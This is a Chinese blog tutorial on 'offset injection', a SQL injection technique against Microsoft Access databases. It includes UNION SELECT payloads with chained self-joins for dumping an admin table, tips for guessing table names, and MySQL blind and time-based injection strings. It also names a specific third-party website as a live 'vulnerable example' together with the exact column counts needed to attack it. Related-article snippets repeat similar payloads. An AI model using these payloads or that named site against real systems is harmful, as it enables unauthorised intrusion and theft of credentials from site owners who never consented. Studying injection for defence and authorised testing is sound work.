ACCESS数据库偏移注入

已于 2022-04-16 15:48:12 修改
阅读量242 收藏 1
点赞数
分类专栏: 数据库安全 文章标签: 数据库 access
于 2021-05-01 22:05:46 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39756628/article/details/116333652
版权

access数据库简介

access 关系型数据库,同时 也是文件型数据库,不需要端口号。
结构上与其他关系型数据库不同,只有表名、列名、字段名, 没有数据库名, 自己网站自己管,数据库*.mdb直接在自己网站目录下面,同时它也没有一些相关函数,如文件读写等,目前用的已经不多了。

注入偏移步骤

判断列数=》22
在这里插入图片描述
在这里插入图片描述
联合查询
在这里插入图片描述
逐个向前迁移判断表中字段数=》22-16=6
在这里插入图片描述

爆破字段内容:

一级偏移注入22-6×2=10

UNION SELECT 1,2,3,4,5,6,7,8,9,10,*from (admin as a inner join admin as b on a.id = b.id)
在这里插入图片描述
二级偏移注入10-6=4

UNION SELECT 1,2,3,4,a.id,b.id,c.id,*from ((admin as a inner join admin as b on a.id = b.id)inner join admin as c on a.id=c.id)
在这里插入图片描述
查看源码
在这里插入图片描述
有的可能还需要三级偏移注入

a.id,b.id,c.id,c.id,*from (((admin as a inner join admin as b on a.id = b.id)inner join admin as c on a.id=c.id)inner join admin as d on a.id=d.id)

表名猜解思路

表名猜解的话可以通过扫后台登陆url,url中的路径名可能就是表名
还有就是登陆框源码,其中的用户名密码变量名也有可能就是表名
如果还是不行,那只能通过字典爆破了

access数据库注入漏洞实例站点

http://www.ronghuhotel.com/Newsview.asp?id=23

order 16 字段5 需二级偏移注入

mysql与sql server数据库可操作内容对比

每个数据库的操作内容都不相同,同时权限不同,可执行的内容也不同,如下是mysql与mssql数据库操作内容对比:

mysql数据库,root是最高权限
在这里插入图片描述
sql server里面,sysadmin是最高权限
在这里插入图片描述

手工猜解思路

?id=-1 and length(database())=2
?id=2’ and substr(database(),1,1)=’s’–+

盲注

?id=1’ and if(length(database())=1,sleep(5),1)–+

dddxsr
关注
专栏目录
access偏移注入
weiliang369的博客
02-22 1712
access偏移注入 利用情景 1.偏移注入access偏移注入,主要是由于数据库结构的问题,其他数据库没办法利用。 2.用于解决判断出表名,得不到字段的困境。 偏移注入的特点 1.看人品和技巧的注入方法,不是100%能成功(基本上看了我的总结成功率就很高了)。 2.无需管理账号密码字段,直接爆账号密码。 利用条件 1.已知管理表名 2.已知任意字段(一个或多个多个会增加几率) 影响偏移注入成功率的因素 1.管理表的字段数越少越好(最好就三个 1.id 2.账号字段 3.密码字段
access数据库偏移注入
haha1314的博客
05-01 251
一、access注入 access只有一个数据库 A联合注入 1、order by 20 确定字段数 猜表名 2、union select 1,2,3,4,5,6 from admin 爆数字 3、union select password,2,3,4,5,6 from admin 猜列名 B逐字注入 1、 and exist(select * from admin) 猜表 ...
Access数据库--偏移注入
Y22Lee的博客
03-24 263
由于我的学习进度到了偏移注入,所以在网上也查找相关资料来查漏补缺填补我的不足,但是我发现我与网上的博主注入思路相差不大,区别在于他们大都使用了SQL 内连接函数 inner join帮助输出结果,下面是我的方法!对于Access数据库我上一篇的Access–cookie注入已经介绍过,偏移注入与cookie注入的方法和使用的函数部分相同。但是偏移注入的使用场景比它更加特殊偏移注入只需要爆破出任一表名,不需要知道任意字段名即可完成注入。a.偏移注入不只是针对Access数据库
Access数据库注入偏移注入
seek_2022的博客
05-02 2771
文章目录一、偏移注入使用场景二、必要的SQL知识补充(一)admin.*是什么意思?(二)联合查询的字段数问题(三)access如何查询指定数据?三、靶场实战(一)判断是否存在cookie注入(二)爆破表名(三)判断当前页面显错位(四)查询admin表字段数(五)偏移注入查询flag 一、偏移注入使用场景 在SQL注入的时候会遇到一些无法查询列名的问题,比如系统自带数据库的权限不够而无法访问系统自带库。 当你猜到表名无法猜到字段名的情况下,我们可以使用偏移注入来查询那张表里面的数据。像Sqlmap之类的工
渗透测试基础-Access数据库偏移注入
weixin_45488495的博客
04-12 462
渗透测试基础-Access数据库偏移注入偏移注入漏洞总结 只为对所学知识做一个简单的梳理,如果有表达存在问题的地方,麻烦帮忙指认出来。我们一起为了遇见更好的自己而努力????! 偏移注入 偏移注入的应用场景是,当这个地方我们有了表名,但是字段名始终弄不来的使用方法。 先来了解一些数据库小知识 select * from school 代表的是查询school表里面的所有数据(如图) 但其实我们可以换其他的写法,来达到相同的查询效果 select school.* from school 所以咱们这里的
Access数据库——偏移注入之移位溢注
最新发布
weixin_53026460的博客
04-19 396
偏移注入正统的叫法是移位溢注,我们现在要学的方法叫做移位溢注,它跟正统的偏移注入不一样,移位溢注是现在做偏移注入比较主流的方法;真正的偏移注入是要用一些左连接右连接的查询,比较麻烦,而且成功率比较低;所以我们学习成功率比较高的移位溢注;之前我们学习过:库.表.字段=> 选中某库中的某表中的某字段查询admin表里面的全部字段内容​​可以看到里面有id、username、password字段;​​输入就能查询到admin表里字段内容;​会发现等价于;
Access偏移注入
10-02
Access偏移注入是一种针对Microsoft Access数据库的特殊SQL注入技术。这种技术利用了Access数据库在处理SQL语句时的一些特性,允许攻击者通过构造特殊的SQL查询来获取数据库中的敏感信息。偏移注入的核心思想在于...
access偏移注入原理
m0_56069948的博客
01-17 595
Python微信订餐小程序课程视频 https://edu.csdn.net/course/detail/36074 Python实战量化交易理财系统 https://edu.csdn.net/course/detail/35475 前言:近段时间在学习access偏移注入时,在网上查询了大量的资料,感觉很多资料讲解的十分模糊并且我个人认为有很多不够严谨的地方,于是我便在线下经过大量测试,写出以下文章,如有错误,望指出。 如要转载,请标明出处!! 一、认识偏移注入 偏移注入的适用背景: access
数据库偏移注入原理
Do的博客
11-16 532
数据库偏移注入原理 场景 在常见的SQL注入当中,一般是将数据库中的表名、列名猜解出来之后,然后通过查询的方式获取具体的数据值。如SqlMap就是采用这样的注入流程进行数据获取的。但是这样的方式存在一个问题就是当知道数据表的名字,但是列名很长,或者数据库系统比较简单,不能通过查询系统数据库中的信息获取到用户表中的表名时就很难获取到想要的数据信息,如access数据库。(比如其中SQL Server 和MySQL都可以通过查询系统数据库获取到具体的列名) 原理 简单来说偏移注入的原理就是通过连接查询方式
Access数据库高级偏移注入
haodawei123的博客
01-17 317
注入语句: 1、进行偏移检测 http://xxx?Id=3 union select 1,2,3,4,5,6,7,8,9,10,11,12, from admin 2、* from (admin as a inner join admin as b on a.id=b.id)用这里的替换一下,减少字段的数量只到网页返回正确就可能爆出账号密码 3、a.id,b.id,* from (admin a...
Acces数据库注入|偏移注入
向阳-Y.的博客
11-06 497
Acces数据库注入方式和其他主流数据库稍微有不同,因为Acces数据库的特性,也不会存在高权限跨库。 1.Access一般采用暴力猜解的方式进行注入 和MySQL等注入都是大同小异的,只是Access不能查看information文件,只能靠暴力猜解,相关Mysql注入文章 2.Access偏移注入:解决列名获取不到的情况 所有的数据库注入方式基本相同,除了access注入,这里补充一下:access偏移注入 2.1.先找出有多少个列: http://xxxxxx?id=xx union all se
【实战渗透】对 ACCESS 偏移注入实战(针对爆不出字段名)
V1040375575的博客
09-08 498
ACCESS偏移注入记录 Access偏移注入原理,基本公式为: order by 出的字段数减去*号的字段数,然而再用order by的字段数减去2倍刚才得出来的答案; 也就是: orderby = 22 * = 6个字符 2 × * = 12个字符 22 - 12 = 10个字符 注入点: www.xxx.com/Newsview.asp?id=832 查询字段数: www.xxx.com/Newsview.asp?id=832order by 16回显正常...
Access-偏移注入
weixin_45634365的博客
03-02 309
在SQL注入的时候会遇到一些无法查询列名的问题,例如系统自带数据库的权限不够而无法访问系统自带库,例如Access根本没有系统自带库,需要强行猜解表名 在猜到表名无法猜到字段名的情况下,可以使用偏移注入来查询表里面的数据 像sqlmap之类的工具实际上是爆破字段的名字,但是如果字段名比较奇怪,sqlmap就无能为力了 偏移注入终比较常用的方法是移位溢注 移位溢注 #假设admin表里面有id、username、password三个字段 #admin.*代表了admin表里所有的字段 select * fro
Access偏移注入
qq_58000413的博客
09-19 331
> select id,username,password,1,2,3,4,5 from admin 若显错位在3,4位置,则输出password,1。=>select 1,id,username,password,2,3,4,5 from admin 则输出username,password。=>select 1,2,id,username,password,3,4,5 from admin 则输出id,username。Access数据库排序。
Access——偏移注入
qq_39416206的博客
03-09 605
Access偏移注入靶场思路
【漏洞扫描】——14、AWVS工程扫描
Fly_鹏程万里
03-01 2053
本篇文章我们主要介绍AWVS如何对目标网站进行扫描以及如何导出扫描报告。
ACCESS数据库高级注入技术探讨
在网络安全领域,"ACCESS高级注入"是指针对Microsoft Access数据库进行的深度和复杂的注入攻击。Access数据库虽然在功能上相对较弱,但攻击者依然可以通过巧妙的方法来利用其弱点,对系统进行攻击。本文将深入解析...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值